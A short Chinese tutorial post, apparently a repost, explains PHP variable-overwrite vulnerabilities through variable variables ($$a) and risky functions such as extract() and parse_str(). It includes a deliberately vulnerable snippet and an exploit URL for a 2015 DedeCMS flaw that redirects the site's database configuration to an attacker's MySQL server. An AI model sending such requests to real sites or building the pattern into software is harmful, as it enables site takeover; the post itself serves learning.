记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

CTF题目:变量覆盖漏洞

2020-10-18 16:20

CTF题目:变量覆盖漏洞-极度安全

看下这段代码:

  1. <?php
  2. $a='aaa';
  3. $aaa='xxx';
  4. echo $$a; //$$a=$($a)=$(aaa)='xxx'
  5. ?>

最后回显的是xxx,讲实话,我第一次明白了这个原理后,不禁吐槽,啥?这就是世界上最好的语言???这种低级错误还能有?

我们再回到漏洞本身:

  1. <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
  2. <?php
  3. $a='aa';
  4. $aa='123';
  5. echo '第一次变量aa的值是'.$aa.'<br>';
  6. $$a=$_GET['name'];
  7. echo '第二次变量aa的值是'.$aa.'<br>'; //$$a=$($a)=$aa=$_GET
  8. ?>

CTF题目:变量覆盖漏洞-极度安全

发现:代码审计,扫描工具扫不出

变量覆盖漏洞大多数由函数使用不当导致,经常引发变量覆盖漏洞的函数有:extract(),parse_str()和import_request_variables()

织梦dedecms的2015年一次变量覆盖:

  1. http://www.xx.com/织梦网站后台
  2. /login.php?dopost=login&validate=dcug&useri
  3. d=账号&pwd=密码& _POST[GLOBALS]
  4. [cfg_dbhost]=MYSQL外链IP&_POST[GLOBALS] [cfg_dbuser]=MYSQL的账号
  5. &_POST[GLOBALS][cfg_dbpwd]=MYSQL的密码&
  6. _POST[GLOBALS] [cfg_dbname]=自己的dedecms的数据库

变量覆盖导致重写为任意数据库配置。


知识来源: https://www.secvery.com/2826.html

阅读:9396 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“CTF题目:变量覆盖漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云

本页关键词